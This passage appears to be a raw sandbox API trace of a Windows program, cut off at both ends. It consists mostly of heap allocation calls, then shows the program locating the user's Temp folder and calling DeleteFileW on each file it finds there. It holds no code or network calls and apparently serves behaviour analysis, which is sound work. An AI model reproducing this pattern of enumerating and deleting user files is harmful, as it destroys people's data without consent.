hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0250.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0250.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0250.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0250.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0250.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0250.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0250.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0250.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0250.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0250.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0250.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0250.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0250.072] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0250.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0250.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0250.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0250.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0250.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0250.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0250.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0250.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0250.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0250.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0250.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0250.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0250.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0250.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0250.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0250.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0250.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0250.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0250.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0250.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0250.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0250.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0250.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0250.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0250.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0250.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0250.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0250.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0250.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0250.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0250.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0250.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0250.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0250.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0250.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0250.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0250.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0250.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0250.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0250.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0250.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0250.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0250.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0250.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0250.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0250.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0250.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0250.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0250.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0250.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0250.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0250.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0250.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0250.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0250.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0250.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0250.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0250.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0250.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0250.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0250.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0250.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0250.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0250.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0250.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0250.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0250.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0250.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0250.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0250.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0250.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0250.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0250.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0250.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0250.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0250.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0250.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0250.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0250.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0250.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0250.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0250.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0250.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0250.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0250.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0250.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0250.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0250.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0250.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0250.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0250.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0250.077] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0250.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0250.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0250.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0250.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0250.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0250.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0250.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0250.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0250.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0250.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0250.077] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0250.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0250.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0250.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa370 [0250.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0250.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0250.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa670 [0250.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0250.078] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0250.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0250.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0250.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0250.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0250.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0250.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0250.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0250.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0250.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0250.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0250.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0250.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0250.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0250.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0250.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0250.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0250.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0250.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0250.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0250.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0250.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0250.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0250.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0250.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0250.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0250.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0250.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x62) returned 0x2417000 [0250.079] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Temp", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp", lpFilePart=0x8bedfc*="Temp") returned 0x30 [0250.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2417000 | out: hHeap=0x25c0000) returned 1 [0250.079] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp")) returned 0x2010 [0250.079] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x89f2df0, ftLastAccessTime.dwHighDateTime=0x1d509d7, ftLastWriteTime.dwLowDateTime=0x89f2df0, ftLastWriteTime.dwHighDateTime=0x1d509d7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x11a6, dwReserved1=0x4, cFileName=".", cAlternateFileName="")) returned 0xaa5820 [0250.079] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x89f2df0, ftLastAccessTime.dwHighDateTime=0x1d509d7, ftLastWriteTime.dwLowDateTime=0x89f2df0, ftLastWriteTime.dwHighDateTime=0x1d509d7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x11a6, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 1 [0250.079] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe12b8c00, ftCreationTime.dwHighDateTime=0x1d4d1aa, ftLastAccessTime.dwLowDateTime=0xb9eec460, ftLastAccessTime.dwHighDateTime=0x1d4c79e, ftLastWriteTime.dwLowDateTime=0xb9eec460, ftLastWriteTime.dwHighDateTime=0x1d4c79e, nFileSizeHigh=0x0, nFileSizeLow=0x18eef, dwReserved0=0x11a6, dwReserved1=0x4, cFileName="2_FAYOTjMI.pptx", cAlternateFileName="2_FAYO~1.PPT")) returned 1 [0250.080] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\2_FAYOTjMI.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\2_fayotjmi.pptx")) returned 1 [0250.080] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc51fc999, ftCreationTime.dwHighDateTime=0x1d2127e, ftLastAccessTime.dwLowDateTime=0x5a0b330, ftLastAccessTime.dwHighDateTime=0x1d509d7, ftLastWriteTime.dwLowDateTime=0x72e952ff, ftLastWriteTime.dwHighDateTime=0x1d0e25a, nFileSizeHigh=0x0, nFileSizeLow=0xbeef, dwReserved0=0x11a6, dwReserved1=0x4, cFileName="32.cab", cAlternateFileName="")) returned 1 [0250.080] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\32.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\32.cab")) returned 1 [0250.081] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc51fc999, ftCreationTime.dwHighDateTime=0x1d2127e, ftLastAccessTime.dwLowDateTime=0x5a575f0, ftLastAccessTime.dwHighDateTime=0x1d509d7, ftLastWriteTime.dwLowDateTime=0x7351b327, ftLastWriteTime.dwHighDateTime=0x1d0e25a, nFileSizeHigh=0x0, nFileSizeLow=0xc79d, dwReserved0=0x11a6, dwReserved1=0x4, cFileName="64.cab", cAlternateFileName="")) returned 1 [0250.081] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\64.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\64.cab")) returned 1 [0250.081] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x73945680, ftCreationTime.dwHighDateTime=0x1d4c805, ftLastAccessTime.dwLowDateTime=0xdd6698a0, ftLastAccessTime.dwHighDateTime=0x1d4c942, ftLastWriteTime.dwLowDateTime=0xdd6698a0, ftLastWriteTime.dwHighDateTime=0x1d4c942, nFileSizeHigh=0x0, nFileSizeLow=0x8b50, dwReserved0=0x11a6, dwReserved1=0x4, cFileName="6Vo3LqVjSKc08E.jpg", cAlternateFileName="6VO3LQ~1.JPG")) returned 1 [0250.081] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\6Vo3LqVjSKc08E.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\6vo3lqvjskc08e.jpg")) returned 1 [0250.082] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x89f2df0, ftCreationTime.dwHighDateTime=0x1d509d7, ftLastAccessTime.dwLowDateTime=0x89f2df0, ftLastAccessTime.dwHighDateTime=0x1d509d7, ftLastWriteTime.dwLowDateTime=0x89f2df0, ftLastWriteTime.dwHighDateTime=0x1d509d7, nFileSizeHigh=0x0, nFileSizeLow=0x118, dwReserved0=0x11a6, dwReserved1=0x4, cFileName="888.vbs", cAlternateFileName="")) returned 1 [0250.082] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\888.vbs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\888.vbs")) returned 1 [0250.082] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xffae7e90, ftCreationTime.dwHighDateTime=0x1d4cac9, ftLastAccessTime.dwLowDateTime=0x9976ff60, ftLastAccessTime.dwHighDateTime=0x1d4d2a0, ftLastWriteTime.dwLowDateTime=0x9976ff60, ftLastWriteTime.dwHighDateTime=0x1d4d2a0, nFileSizeHigh=0x0, nFileSizeLow=0xaa67, dwReserved0=0x11a6, dwReserved1=0x4, cFileName="9etFV.gif", cAlternateFileName="")) returned 1 [0250.082] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\9etFV.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\9etfv.gif")) returned 1 [0250.083] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa531010, ftCreationTime.dwHighDateTime=0x1d4d06d, ftLastAccessTime.dwLowDateTime=0xf01fdd20, ftLastAccessTime.dwHighDateTime=0x1d4c925, ftLastWriteTime.dwLowDateTime=0xf01fdd20, ftLastWriteTime.dwHighDateTime=0x1d4c925, nFileSizeHigh=0x0, nFileSizeLow=0x1613f, dwReserved0=0x11a6, dwReserved1=0x4, cFileName="9fSp7QBmmZu.pps", cAlternateFileName="9FSP7Q~1.PPS")) returned 1 [0250.083] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\9fSp7QBmmZu.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\9fsp7qbmmzu.pps")) returned 1 [0250.084] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8426eba0, ftCreationTime.dwHighDateTime=0x1d4d5ae, ftLastAccessTime.dwLowDateTime=0x8426eba0, ftLastAccessTime.dwHighDateTime=0x1d4d5ae, ftLastWriteTime.dwLowDateTime=0x842e0fc0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x2fc, dwReserved0=0x11a6, dwReserved1=0x4, cFileName="AdobeARM.log", cAlternateFileName="")) returned 1 [0250.084] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\adobearm.log")) returned 1 [0250.085] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5e3e380, ftCreationTime.dwHighDateTime=0x1d4c553, ftLastAccessTime.dwLowDateTime=0xf02396d0, ftLastAccessTime.dwHighDateTime=0x1d4c89a, ftLastWriteTime.dwLowDateTime=0xf02396d0, ftLastWriteTime.dwHighDateTime=0x1d4c89a, nFileSizeHigh=0x0, 